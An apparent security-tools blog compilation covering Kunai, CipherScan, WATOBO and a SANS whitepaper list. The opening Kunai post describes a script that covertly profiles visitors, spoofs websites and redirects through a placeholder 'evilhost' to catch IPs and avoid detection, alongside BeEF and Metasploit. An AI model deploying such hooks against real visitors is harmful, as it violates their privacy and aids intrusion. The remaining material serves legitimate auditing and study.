In order to grab as much information as possible, the script detects whether JavaScript is enabled, to obtain more details about a visitor. For example, you can include this script in an iframe, or perform redirects, to avoid detection of suspicious activity. The script can notify you via email about a user who visits your script. Whenever someone visits your hook (kunai), the output file is updated.

Functions

  • Stores information about users in an elegant output
  • Website spoofing
  • Redirects
  • BeEF & Metasploit compatibility
  • Email notification
  • Different reaction for browsers with JavaScript disabled
  • One file composition

Example configs

  • Website spoofing (more stable & better for autopwn & beef):
  • Redirect (better for quick ip catching):
goo.gl/urlink -> evilhost/x.php -> site.com/kitty.png
  • Cross Site Scripting (inclusion)

Screens


More information can be found on: https://github.com/Smaash/kunai

CipherScan – A very simple way to find out which SSL ciphersuites are supported by a target


CipherScan

$ ./cipherscan jve.linuxwall.info
........................
Target: jve.linuxwall.info:443

prio  ciphersuite                  protocols              pfs                 curves
1     ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                ECDH,P-384,384bits  secp384r1
2     ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                ECDH,P-384,384bits  secp384r1
3     DHE-RSA-AES128-GCM-SHA256    TLSv1.2                DH,2048bits         None
4     DHE-RSA-AES256-GCM-SHA384    TLSv1.2                DH,2048bits         None
5     ECDHE-RSA-AES128-SHA256      TLSv1.2                ECDH,P-384,384bits  secp384r1
6     ECDHE-RSA-AES128-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-384,384bits  secp384r1
7     ECDHE-RSA-AES256-SHA384      TLSv1.2                ECDH,P-384,384bits  secp384r1
8     ECDHE-RSA-AES256-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-384,384bits  secp384r1
9     DHE-RSA-AES128-SHA256        TLSv1.2                DH,2048bits         None
10    DHE-RSA-AES128-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
11    DHE-RSA-AES256-SHA256        TLSv1.2                DH,2048bits         None
12    DHE-RSA-AES256-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
13    AES128-GCM-SHA256            TLSv1.2                None                None
14    AES256-GCM-SHA384            TLSv1.2                None                None
15    AES128-SHA256                TLSv1.2                None                None
16    AES256-SHA256                TLSv1.2                None                None
17    AES128-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
18    AES256-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
19    DHE-RSA-CAMELLIA256-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
20    CAMELLIA256-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
21    DHE-RSA-CAMELLIA128-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
22    CAMELLIA128-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
23    DES-CBC3-SHA                 TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: trusted, 2048 bit, sha256WithRSAEncryption signature
TLS ticket lifetime hint: 300
OCSP stapling: supported
Cipher ordering: server

Cipherscan tests the ordering of the SSL/TLS ciphers on a given target, for all major versions of SSL and TLS. It also extracts some certificate information, TLS options, OCSP stapling and more. Cipherscan is a wrapper around the openssl s_client command line.

Cipherscan is meant to run on all flavors of Unix. It ships with its own build of OpenSSL for Linux/64 and Darwin/64. On other platforms, it will use the openssl version provided by the operating system (which may have limited cipher support), or your own version provided via the -o command line flag.

Examples

Basic test:

$ ./cipherscan google.com
...................
Target: google.com:443

prio  ciphersuite                  protocols                    pfs                 curves
1     ECDHE-RSA-CHACHA20-POLY1305  TLSv1.2                      ECDH,P-256,256bits  prime256v1
2     ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                      ECDH,P-256,256bits  prime256v1
3     ECDHE-RSA-AES128-SHA         TLSv1.1,TLSv1.2              ECDH,P-256,256bits  prime256v1
4     ECDHE-RSA-RC4-SHA            SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
5     AES128-GCM-SHA256            TLSv1.2                      None                None
6     AES128-SHA256                TLSv1.2                      None                None
7     AES128-SHA                   TLSv1.1,TLSv1.2              None                None
8     RC4-SHA                      SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
9     RC4-MD5                      SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
10    ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                      ECDH,P-256,256bits  prime256v1
11    ECDHE-RSA-AES256-SHA384      TLSv1.2                      ECDH,P-256,256bits  prime256v1
12    ECDHE-RSA-AES256-SHA         SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
13    AES256-GCM-SHA384            TLSv1.2                      None                None
14    AES256-SHA256                TLSv1.2                      None                None
15    AES256-SHA                   SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
16    ECDHE-RSA-AES128-SHA256      TLSv1.2                      ECDH,P-256,256bits  prime256v1
17    ECDHE-RSA-DES-CBC3-SHA       SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
18    DES-CBC3-SHA                 SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: trusted, 2048 bit, sha1WithRSAEncryption signature
TLS ticket lifetime hint: 100800
OCSP stapling: not supported
Cipher ordering: server

Testing STARTTLS:

darwin$ ./cipherscan --curves -starttls xmpp jabber.ccc.de:5222
................................
Target: jabber.ccc.de:5222

prio  ciphersuite                  protocols              pfs                 curves
1     ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                ECDH,P-256,256bits  prime256v1
2     ECDHE-RSA-AES256-SHA384      TLSv1.2                ECDH,P-256,256bits  prime256v1
3     ECDHE-RSA-AES256-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
4     DHE-RSA-AES256-GCM-SHA384    TLSv1.2                DH,1024bits         None
5     DHE-RSA-AES256-SHA256        TLSv1.2                DH,1024bits         None
6     DHE-RSA-AES256-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
7     DHE-RSA-CAMELLIA256-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
8     AES256-GCM-SHA384            TLSv1.2                None                None
9     AES256-SHA256                TLSv1.2                None                None
10    AES256-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
11    CAMELLIA256-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
12    ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                ECDH,P-256,256bits  prime256v1
13    ECDHE-RSA-AES128-SHA256      TLSv1.2                ECDH,P-256,256bits  prime256v1
14    ECDHE-RSA-AES128-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
15    DHE-RSA-AES128-GCM-SHA256    TLSv1.2                DH,1024bits         None
16    DHE-RSA-AES128-SHA256        TLSv1.2                DH,1024bits         None
17    DHE-RSA-AES128-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
18    DHE-RSA-SEED-SHA             TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
19    DHE-RSA-CAMELLIA128-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
20    AES128-GCM-SHA256            TLSv1.2                None                None
21    AES128-SHA256                TLSv1.2                None                None
22    AES128-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
23    SEED-SHA                     TLSv1,TLSv1.1,TLSv1.2  None                None
24    CAMELLIA128-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: UNTRUSTED, 2048 bit, sha1WithRSAEncryption signature
TLS ticket lifetime hint: None
OCSP stapling: not supported
Cipher ordering: client
Curves ordering: server
Curves fallback: False

Exporting to JSON with the -j command line option:

$ ./cipherscan --curves -j www.ebay.com | j
{
    "curves_fallback": "False",
    "serverside": "True",
    "target": "www.ebay.com:443",
    "utctimestamp": "2015-04-03T14:54:31.0Z",
    "ciphersuite": [
        {
            "cipher": "AES256-SHA",
            "ocsp_stapling": "False",
            "pfs": "None",
            "protocols": [
                "TLSv1",
                "TLSv1.1",
                "TLSv1.2"
            ],
            "pubkey": [
                "2048"
            ],
            "sigalg": [
                "sha1WithRSAEncryption"
            ],
            "ticket_hint": "None",
            "trusted": "True"
        },
        {
            "cipher": "ECDHE-RSA-DES-CBC3-SHA",
            "curves": [
                "prime256v1",
                "secp384r1",
                "secp224r1",
                "secp521r1"
            ],
            "curves_ordering": "server",
            "ocsp_stapling": "False",
            "pfs": "ECDH,P-256,256bits",
            "protocols": [
                "TLSv1",
                "TLSv1.1",
                "TLSv1.2"
            ],
            "pubkey": [
                "2048"
            ],
            "sigalg": [
                "sha1WithRSAEncryption"
            ],
            "ticket_hint": "None",
            "trusted": "True"
        }
    ]
}

Analyzing configurations

The motivation behind cipherscan is to help operators configure good TLS on their endpoints. To help with this, the script analyze.py compares the results of a cipherscan against the TLS guidelines from https://wiki.mozilla.org/Security/Server_Side_TLS and outputs a level and recommendations.

$ ./analyze.py -t jve.linuxwall.info
jve.linuxwall.info:443 has intermediate tls

Changes needed to match the old level:
* consider enabling SSLv3
* add cipher DES-CBC3-SHA
* use a certificate with sha1WithRSAEncryption signature
* consider enabling OCSP Stapling

Changes needed to match the intermediate level:
* consider enabling OCSP Stapling

Changes needed to match the modern level:
* remove cipher AES128-GCM-SHA256
* remove cipher AES256-GCM-SHA384
* remove cipher AES128-SHA256
* remove cipher AES128-SHA
* remove cipher AES256-SHA256
* remove cipher AES256-SHA
* disable TLSv1
* consider enabling OCSP Stapling

In the output above, analyze.py indicates that the target jve.linuxwall.info matches the intermediate configuration level. If the administrator of this site wants to reach the modern level, the items that failed under the modern tests should be corrected.

analyze.py does not make any assumption about what a good level should be. Site operators should know what level they want to match against, based on the compatibility they want to support. Again, refer to https://wiki.mozilla.org/Security/Server_Side_TLS for more information.

Note on Nagios mode: analyze.py can be run as a Nagios check with --nagios. The exit code will then represent the state of the configuration:

  • 2 (critical) for bad tls
  • 1 (warning) if it doesn’t match the desired level
  • 0 (ok) if it matches

cipherscan can take more than 10 seconds to complete. To alleviate any timeout issues, you may want to run it outside of Nagios, passing data through a temporary file.
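As an added example (not analyze.py or any other part of cipherscan), the following Python script reads a scan in the -j JSON shape shown above, applies a simplified subset of the checks that analyze.py's output lists (non-PFS ciphers and TLSv1 for the modern level, SHA-1 certificate signatures and 1024-bit DH parameters for the intermediate level, OCSP stapling as an advisory item), and maps the achieved level to the --nagios exit codes described in the note. The sample scan, its hostname and the thresholds are constructed simplifications of my own, not the Mozilla guideline tables.

```python
"""Evaluate a cipherscan -j result against a simplified subset of the TLS guidelines.

Added example: this is not analyze.py or any other part of cipherscan. The JSON
shape follows the -j output shown above; the sample scan and the level
thresholds are my own simplification, not the Mozilla guideline tables.
"""
import json
from typing import Dict, List

# Rank of each configuration level, lowest first; "bad" is below every level.
LEVEL_RANK = {"bad": 0, "old": 1, "intermediate": 2, "modern": 3}

# Constructed sample in the shape of `cipherscan -j`; host and values are made up.
SAMPLE_SCAN = json.dumps({
    "target": "scan-target.example:443",
    "serverside": "True",
    "ciphersuite": [
        {"cipher": "AES256-SHA", "pfs": "None",
         "protocols": ["TLSv1", "TLSv1.1", "TLSv1.2"], "pubkey": ["2048"],
         "sigalg": ["sha1WithRSAEncryption"], "ocsp_stapling": "False", "trusted": "True"},
        {"cipher": "ECDHE-RSA-AES128-GCM-SHA256", "pfs": "ECDH,P-256,256bits",
         "protocols": ["TLSv1.2"], "pubkey": ["2048"],
         "sigalg": ["sha1WithRSAEncryption"], "ocsp_stapling": "False", "trusted": "True"},
        {"cipher": "DHE-RSA-AES128-SHA", "pfs": "DH,1024bits",
         "protocols": ["TLSv1", "TLSv1.1", "TLSv1.2"], "pubkey": ["2048"],
         "sigalg": ["sha1WithRSAEncryption"], "ocsp_stapling": "False", "trusted": "True"},
    ],
})


def analyze(scan_json: str) -> Dict[str, object]:
    """Return the level the target reaches plus the changes needed for each higher level."""
    scan = json.loads(scan_json)
    suites = scan["ciphersuite"]
    findings: Dict[str, List[str]] = {"intermediate": [], "modern": [], "advisory": []}

    protocols = {p for s in suites for p in s["protocols"]}
    if "SSLv3" in protocols:
        findings["intermediate"].append("disable SSLv3")
    if "TLSv1" in protocols:
        findings["modern"].append("disable TLSv1")

    for s in suites:
        if s["pfs"] == "None":
            # Non-PFS suites are what analyze.py lists under "remove cipher" for modern.
            findings["modern"].append(f"remove cipher {s['cipher']}")
        elif s["pfs"].startswith("DH,") and s["pfs"].endswith("1024bits"):
            # Assumed threshold of this example: 1024-bit DH fails the intermediate level.
            findings["intermediate"].append(f"cipher {s['cipher']} uses 1024-bit DH parameters")

    sigalgs = {a for s in suites for a in s["sigalg"]}
    if sigalgs and all(a.startswith("sha1") for a in sigalgs):
        findings["intermediate"].append("use a certificate with a SHA-256 signature")
    if all(s["ocsp_stapling"] == "False" for s in suites):
        findings["advisory"].append("consider enabling OCSP Stapling")

    if any(s["trusted"] != "True" for s in suites):
        level = "bad"  # assumption of this example: an untrusted certificate is "bad tls"
    elif findings["intermediate"]:
        level = "old"
    elif findings["modern"]:
        level = "intermediate"
    else:
        level = "modern"
    return {"target": scan["target"], "level": level, "findings": findings}


def nagios_exit_code(level: str, desired: str) -> int:
    """Map the achieved level to the --nagios exit codes described in the text."""
    if level == "bad":
        return 2
    if LEVEL_RANK[level] < LEVEL_RANK[desired]:
        return 1
    return 0


if __name__ == "__main__":
    report = analyze(SAMPLE_SCAN)
    print(f"{report['target']} has {report['level']} tls")
    for lvl, items in report["findings"].items():
        for item in items:
            print(f"[{lvl}] {item}")
    raise SystemExit(nagios_exit_code(report["level"], "intermediate"))
```

Run stand-alone, the script reports the sample target as "old" (its certificate is SHA-1 signed and one suite uses 1024-bit DH), lists the two non-PFS/TLSv1 items that keep it from modern, and exits 1 because the desired level passed to nagios_exit_code is intermediate. Treating a level above the desired one as OK is a choice of this example; analyze.py's exact matching rule is not shown on the page.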

OpenSSL

Cipherscan uses a custom release of OpenSSL for 64-bit Linux and 64-bit Darwin. OpenSSL is built from a custom branch maintained by Peter Mosmans that includes a number of patches not merged upstream. It can be found here: https://github.com/PeterMosmans/openssl

You can build it yourself using the following commands:

git clone https://github.com/PeterMosmans/openssl.git --depth 1 -b 1.0.2-chacha
cd openssl
./Configure zlib no-shared experimental-jpake enable-md2 enable-rc5 \
enable-rfc3779 enable-gost enable-static-engine linux-x86_64
make depend
make
make report

The statically linked binary will be apps/openssl.

More information can be found on: https://github.com/jvehent/cipherscan

WATOBO – the unofficial manual


WATOBO is intended to enable security professionals to perform highly efficient (semi-automated) web application security audits. I am convinced that the semi-automated approach is the best way to perform an accurate audit and to identify most of the vulnerabilities.

WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only. It works like a local proxy, similar to WebScarab, Paros or Burp Suite.

Additionally, WATOBO supports passive and active checks. Passive checks are more like filter functions. They are used to collect useful information, e.g. email or IP addresses. Passive checks will be performed during normal browsing activities. No additional requests are sent to the (web) application.

Active checks instead will produce a high number of requests (depending on the check module) because they do the automatic part of vulnerability identification, e.g. during a scan.

The functions of WATOBO:

  • Supports session management
  • Detects logout and automatically re-logs in
  • Supports filter functions
  • Inline encoder/decoder
  • Includes a vulnerability scanner
  • Quick-scan for targeted scanning of a URL
  • Full-scan to scan a whole session
  • Manual request editor with special functions
  • Session information is updated
  • Login can be done automatically
  • Transcoder: URL, Base64, MD5, SHA-1
  • Interceptor
  • Fuzzer
  • Free, stable and open source!
  • Script code easy to understand
  • Easy to extend / adapt
  • Tested and developed in real-world scenarios
  • Speed / usability
  • Active and passive checks
  • Runs under Windows, Linux, BackTrack, MacOS

All these great features and functions make WATOBO one of the top free web assessment tools.

The program can be downloaded from: http://sourceforge.net/projects/watobo/

Pen Testing Resources: Whitepapers


White Papers are an excellent source for information gathering, problem-solving and learning. Below is a list of White Papers written by penetration testing practitioners seeking certification. SANS attempts to ensure the accuracy of information, but papers are published “as is”.

Errors or inconsistencies may exist or may be introduced over time. If you suspect a serious error, please contact webmaster@sans.org.

Featured Papers

This featured paper includes some really useful techniques that penetration testers should master. Read it, learn it, and live it, as you extend your skills.

Paper Author Certification
Practical El Jefe Vedaa, Charles GCIH
Correctly Implementing Forward Secrecy Schum, Chris GCIH
Powercat Douglas, Mick GPEN
Detecting Crypto Currency Mining in Corporate Environments D’Herdt, Jan GCIH
Penetration Testing: Alternative to Password Cracking Catanoi, Maxim GPEN
Automated Defense – Using Threat Intelligence to Augment Poputa-Clean, Paul GCIH
Cyber Breach Coaching Hoehl, Michael GCIH
AIX for penetration testers Panczel, Zoltan GPEN
Let’s face it, you are probably compromised. What next? Thyer, Jonathan GPEN
Secure Design with Exploit Infusion Wen Chinn, Yew GCIH
An Analysis of Meterpreter during Post-Exploitation Wadner, Kiel GCIH
Creating a Threat Profile for Your Organization Irwin, Stephen GCIH
Modeling Security Investments With Monte Carlo Simulations Lyon, Dan GWAPT
A Qradar Log Source Extension Walkthrough Stanton, Michael GCIH
Differences between HTML5 or AJAX web applications Thomassin, Sven GWAPT
Small devices needs a large Firewall Mastad, Paul GCIH
Are there novel ways to mitigate credential theft attacks in Windows? Foster, James GCIH
Digital Certificate Revocation Vandeven, Sally GCIH
Incident Response in a Microsoft SQL Server Environment Walker, Juan GCIH
Web Application Penetration Testing for PCI Hoehl, Michael GWAPT
Securing Aviation Avionics Panet-Raymond, Marc GCIH
iPwn Apps: Pentesting iOS Applications Kliarsky, Adam GPEN
Incident Handling Annual Testing and Training Holland, Kurtis GCIH
Rapid Triage: Automated System Intrusion Discovery with Python Bond, Trenton GCIH
Using Open Source Reconnaissance Tools for Business Partner Vulnerability Assessment Young, Sue GCIH
An Approach to Detect Malware Call-Home Activities Cui, Tianqiang GCIH
Active Security Or: How I learned to stop worrying and use IPS with Incident handling Brown, Douglas GCIH
War Pi Christie, Scott GCIH
Getting Started with the Internet Storm Center Webhoneypot Pokladnik, Mason GWAPT
Home Field Advantage: Employing Active Detection Techniques Jackson, Benjamin GCIH
Introduction to the OWASP Mutillidae II Web Pen-Test Training Environment Druin, Jeremy GWAPT
Talking Out Both Sides of Your Mouth: Streamlining Communication via Metaphor More, Josh GCIH
SMS, iMessage and FaceTime security Khalil, George GCIH
Using DomainKeys Identified Mail (DKIM) to Protect your Email Reputation Murphy, Christopher GCIH
Detecting Security Incidents Using Windows Workstation Event Logs Anthony, Russell GCIH
Web Application Injection Vulnerabilities: A Web App’s Security Nemesis? Couture, Erik GWAPT
Event Monitoring and Incident Response Boyle, Ryan GCIH
Website Security for Mobile Ho, Alan GWAPT
Web Log Analysis and Defense with Mod_Rewrite Wanner, Rick GCIH
How to identify malicious HTTP Requests Sarokaari, Niklas GWAPT
Exploiting Embedded Devices Jones, Neil GPEN
InfiniBand Fabric and Userland Attacks Warren, Aron GCIH
Incident Handling in the Healthcare Cloud: Liquid Data and the Need for Adaptive Patient Consent Management Filkins, Barbara GCIH
PDF Obfuscation – A Primer Robertson, Chad GPEN
Attributes of Malicious Files Yonts, Joel GCIH
Exploiting Financial Information Exchange (FIX) Protocol? DeMarco, Darren GCIH
Covert Channels Over Social Networks Selvi, Jose GCIH
Robots.txt Lehman, Jim GWAPT
Penetration Testing Of A Web Application Using Dangerous HTTP Methods Kim, Issac GWAPT
Shedding Light on Security Incidents Using Network Flows Gennuso, Kevin GCIH
In-house Penetration Testing for PCI DSS Koster, Jeremy GPEN
Remote Access Point/IDS Kee, Jared GCIH
Post Exploitation using Metasploit pivot & port forward Dodd, David GPEN
Quick and Effective Windows System Baselining and Comparative Analysis for Troubleshooting and Incident Response Fuller, Kevin GCIH
iPhone Backup Files. A Penetration Tester’s Treasure Manners, Darren GPEN
Mitigating Browser Based Exploits through Behavior Based Defenses and Hardware Virtualization Faust, Joseph GCIH
Securely deploying Android devices Alonso-Parrizas, Angel GCIH
Responding to Zero Day Threats Kliarsky, Adam GCIH
Practical OSSEC Robertson, Chad GCIH
Creating Your Own SIEM and Incident Response Toolkit Using Open Source Tools Sweeny, Jonny GCIH
An Overview Of The Casper RFI Bot O’Connor, Dan GCIH
Pass-the-hash attacks: Tools and Mitigation Ewaida, Bashar GCIH
Solution Architecture for Cyber Deterrence Mowbray, Thomas GPEN
Malicious Android Applications: Risks and Exploitation Boutet, Joany GPEN
Security Incident Handling in High Availability Environments Kibirkstis, Algis GCIH
Using Windows Script Host and COM to Hack Windows Ginos, Alexander GPEN
Effective Use Case Modeling for Security Information & Event Management Frye, Daniel GCIH
Penetration Testing in the Financial Services Industry Olson, Christopher GPEN
Which Disney© Princess are YOU? Brower, Joshua GCIH
Why Crack When You Can Pass the Hash? Hummel, Christopher GCIH
One Admin’s Documentation is their Hacker’s Pentest Vandenbrink, Robert GPEN
IOSTrojan: Who really owns your router? Santander Pelaez, Manuel Humberto GCIH
Visualizing the Hosting Patterns of Modern Cybercriminals Hunt, Drew GCIH
PCI DSS and Incident Handling: What is required before, during and after an incident Moldes, Christian GCIH
A Fuzzing Approach to Credentials Discovery using Burp Intruder Dawson, Karl GPEN
Incident Handlers Guide to SQL Injection Worms Folkerts, Justin GCIH
IOScat – a Port of Netcat’s TCP functions to Cisco IOS Vandenbrink, Robert GCIH
Bypassing Malware Defenses Christiansen, Morton GPEN
Investigative Tree Models Caudle, Rodney GCIH
A Guide to Encrypted Storage Incident Handling Shanks, Wylie GCIH
The SirEG Toolkit Begin, Francois GCIH
Incident Handling as a Service Lundell, Michel GCIH
Zombie profiling with SMTP greylisting Koster, Jeremy GCIH
Using OSSEC with NETinVM Allen, Jon Mark GCIH
Detecting Hydan: Statistical Methods For Classifying The Use Of Hydan Based Stegonagraphy In Executable Files Wright, Craig GCIH
Document Metadata, the Silent Killer… Pesce, Larry GCIH
Espionage – Utilizing Web 2.0, SSH Tunneling and a Trusted Insider Abdel-Aziz, Ahmed GCIH
Following Incidents into the Cloud Reed, Jeffrey GCIH
Covering the Tracks on Mac OS X Leopard Scott, Charles GCIH
Winquisitor: Windows Information Gathering Tool Cardosa, Michael GCIH
An approach to the ultimate in-depth security event management framework Pachis, Nicolas GCIH
Exploitation Kits Revealed – Mpack Martin, Andrew GCIH
Scareware Traversing the World via a Web App Exploit Hillick, Mark GCIH
Mining for Malware – There’s Gold in Them Thar Proxy Logs! Griffin, Joe GCIH
Detecting and Preventing Unauthorized Outbound Traffic Wippich, Brian GCIH
Virtual Rapid Response Systems Mohan, Chris GCIH
An Incident Handling Process for Small and Medium Businesses Pokladnik, Mason GCIH
Stack Based Overflows: Detect & Exploit Christiansen, Morton GCIH
Application Whitelisting: Panacea or Propaganda Beechey, Jim GCIH
Multi-Tool DVD Sets: An important addition to the Incident Handler/ Pen Tester’s toolkit Bandukwala, Jamal GCIH
Expanding Response: Deeper Analysis for Incident Handlers McRee, Russ GCIH
Pros and Cons of using Linux and Windows Live CDs in Incident Handling and Forensics Smith, Ricky GCIH
Inside-Out Vulnerabilities, Reverse Shells Hammer, Richard GCIH
DNS Sinkhole Bruneau, Guy GCIH
The December Storm of WMF: Preparation, Identification, and Containment of Exploits Voorhees, James GCIH
Cisco Security Agent and Incident Handling Farnham, Greg GCIH
A Practical Application of SIM/SEM/SIEM Automating Threat Identification Swift, David GCIH
Effectiveness of Antivirus in Detecting Metasploit Payloads Baggett, Mark GCIH
Network Covert Channels: Subversive Secrecy Sbrusch, Raymond GCIH
Utilizing “AutoRuns” To Catch Malware McMillan, Jim GCIH
Exploiting BlackICE When a Security Product has a Security Flaw Gara-Tarnoczi, Peter GCIH
Remote installation of VMware GSX and a virtual machine Condon, Ed GCIH
Valentine’s Surprise Firedragging in Action de Nie, Paula GCIH
Microsoft Windows Cursor and Icon Format Handling Vulnerability Perkins, Matthew GCIH
IBM AIX invscout Local Command Execution Vulnerability –HONORS Horwath, Jim GCIH
An Analysis of the Remote Code Execution Vulnerability as Described in Microsoft’s MS05-002 Security Bulletin Rose, Jerome GCIH
Identity Theft Made Easy Huber, Eric GCIH
0day targeted malware attack Villatte, Nicolas GCIH
Exploiting Microsoft Internet Explorer Cursor and Icon File Handling Vulnerability Chen, Jerry GCIH
Windows Internet Naming Service – An Exploit Waiting to Happen Berger, Jeremy GCIH
Incident Handler Case File: A New Twist to Social Engineering Hawkins, Ray GCIH
Exploiting Samba Buffer Overflow Vulnerability via MetaSploit Framework Ko, James GCIH
Local Privilege Escalation in Solaris 8 and Solaris 9 via Buffer Overflow in passwd(1) McAdams, Shaun GCIH
A Case Study in Solaris Sadmind Exploitation Nathoo, Karim GCIH
What is Santy bringing you this year? HONORS Danhieux, Pieter GCIH
rLogin Buffer Overflow Vulnerability – Solaris Corredor, Juan GCIH
Fun with Batch Files: The Muma Worm Mackey, David GCIH
A Picture is Worth 500 Malicious Dwords Hall, Timothy GCIH
Remote Exploitation of Icecast 2.0.1 Server Pittner, Jakub GCIH
Freezing Icecast in its Tracks McLaren, Jared GCIH
Microsoft Internet Explorer SP2 Fully Automated Remote Compromise Davies, Alan GCIH
Exploiting Internet Explorer via IFRAME Becher, Jim GCIH
Exploiting PHP code injection: phpMyAdmin Multiple Input Validation Vulnerabilities Kah, Fabrice GCIH
Ramen Worm Ives, Millie GCIH
Sub Seven: A Risk to Your Internet Security Ostrowski, Paul GCIH
Network Printers: Whose friend are they? Hutcheson, Lorna GCIH
WebDAV Buffer Overflow Vulnerability Beckley, Peter GCIH
Open Shares Vulnerability Hill, Siegfried GCIH
Simple Network Management Protocol: Now More than a “Default” Vulnerability Fluharty, Daniel GCIH
The Microsoft IIS 5.0 Internet Printing ISAPI Extension Buffer Overflow Clemenson, Christopher GCIH
The enemy within: Handling the Insider Threat posed by Shatter Attacks Layton, Meg GCIH
IP Masquerading Vulnerability for Linux 2.2.x – CVE-2000-0289 Baccam, Tanya GCIH
IIS 5 In-Process Table Privilege Escalation Vulnerability Fatnani, Kishin GCIH
Hijacked Server Serves Up Foreign Bootlegged Pornography Meyer, Russell GCIH
Multithreaded, Dictionary-Based, Brute Force Password Attack on Linksys BEFSR41 With Remote Management Enabled Using A Modified THC-Hydra Tool Kirch, Joel GCIH
The fascinating tale of a lame hacker, a Linux Box, and how I received permission to deploy my IDS Markham, George GCIH
Sun snmpXdmi Overflow Miller, Kevin GCIH
0x333hate.c: Samba Remote Root Exploit Embrich, Mark GCIH
Stay Alert While Browsing the Internet LaValley, Jim GCIH
Robbing the Bank with ITS/MHTML Protocol Handler Balcik, James GCIH
Exploit Analysis Jenkinson, John GCIH
FTP Port 21 “Friend or Foe” Support for the Cyber Defense Initiative Karrick, Stephen GCIH
Port 1433 Georgas, Mark GCIH
eMule Exploit Renna, Scott GCIH
Reverse Engineering Srvcp.exe Zeltser, Lenny GCIH
Widespread SNMP Vulnerabilities Brooks, Greg GCIH
A Weak Password And A Windows Rootkit: A Recipe For Trouble Ives, John GCIH
Incident Illustration – LoveLetter VBS Gerber, John GCIH
Phising Attack in Organizations: Incident Handlers Perspective Ong, Leonard GCIH
Revisiting the Code Red Worm White, Ravila GCIH
Linux NTPD Buffer Overflow Stadler, Philipp GCIH
The Blind Leading The Blind – Sadmind/IIS Worm Barger, Richard GCIH
Donald Dick 1.55 with Last Updated GUI Component from Version 1.53 Maglich, Ryan GCIH
BruteSSH2 – 21st Century War Dialer Thompson, Bill GCIH
Exploiting Vulnerabilities in Squirrelmail Bong, Kevin GCIH
Port 80 (HTTP) – Apache Web Server Chunk Handling Vulnerability Oksanen, Scott GCIH
Breaking Windows 2000 Passwords via LDAP Password Crackers Hamby, Charles GCIH
Dsniff and Switched Network Switching Bowers, Brad GCIH
Exploiting the LSASS Buffer Overflow Wohlberg, Jon GCIH
Code Red and the Unix Impact Mcguire, David GCIH
Port 443 and Openssl-too-open Lee, Chia-Ling GCIH
Hacker Techniques, Exploits, and Incident Handling Brooker, Denis GCIH
Incident Illustration – Corporate Compromise Hall, Russell GCIH
phpMyAdmin 2.5.7 – Input Validation Vulnerability Thurston, Tracy GCIH
FTP Security and the WU-FTP File Globbing Heap Corruption Vulnerability Webb, Warwick GCIH
Port 1433 Vulnerability: Unchecked Buffer in Password Encryption Procedure Bryner, Jeff GCIH
Windows Media Services NSIISLOG.DLL Remote Buffer Overflow Smith, Steve GCIH
Incident Illustration – Missing Files White, Scott GCIH
Importance of a Minor Incident: W32/Goner@MM Legary, Michael GCIH
Nimda – Surviving the Hydra Schmelzel, Paul GCIH
GIAC Certified Incident Handling Practical Yachera, Stanley GCIH
Incident Illustration – Mstream Gallo, Kenneth GCIH
Incident Illustration – HTTP Services Vulnerabilities Modelo Howard, Gaspar GCIH
Buffer Overflow in /bin/login Puusaari, Matthew GCIH
SQL Server Resolution Service Exploit in Action Hoover, James GCIH
GIAC GCIH Assignment – Pass Harrison, Daniel GCIH
An Attacker On RPC Compromised Remote VPN Host Runs Arbitrary Code on Microsoft Exchange Server 2000 Ho, Wai-Kit GCIH
The Search for “Kozirog” Weaver, Greg GCIH
How to Gain Control of a Windows 2000 Server Using the In-Process Table Privilege Escalation Exploit Stidham, Jonathan GCIH
SQL Slammer Worm Hayden, Chris GCIH
Welchia Worm vs. Policy Makers Fighting Malware with Policy, not with Fire Corll, Benjamin GCIH
Incident Ilustration Chervenka, Dan GCIH
Tracking the Back Orifice Trojan on a University Network Knudsen, Kent GCIH
First Response: An incident handling team learns a few lessons the hard way Cragg, David GCIH
Microsoft RPC-DCOM Buffer Overflow Attack using Dcom.c Farrington, Dean GCIH
Automated Execution of Arbitrary Code Using Forged MIME Headers in Microsoft Internet Explorer Winters, Scott GCIH
False Alarm…Or Was It? Lessons Learned from a Badly Handled Incident Graesser Williams, Dana GCIH
SQL Slammer and Other UDP Port 1434 Threats In support of the Cyber Defense Initiative Ray, Edward GCIH
Bad ESMTP Verb Usage Equals Bad Times for Exchange Smith, Aaron GCIH
Real Network’s Remote Server Remote Root Exploit Lastor, Michael GCIH
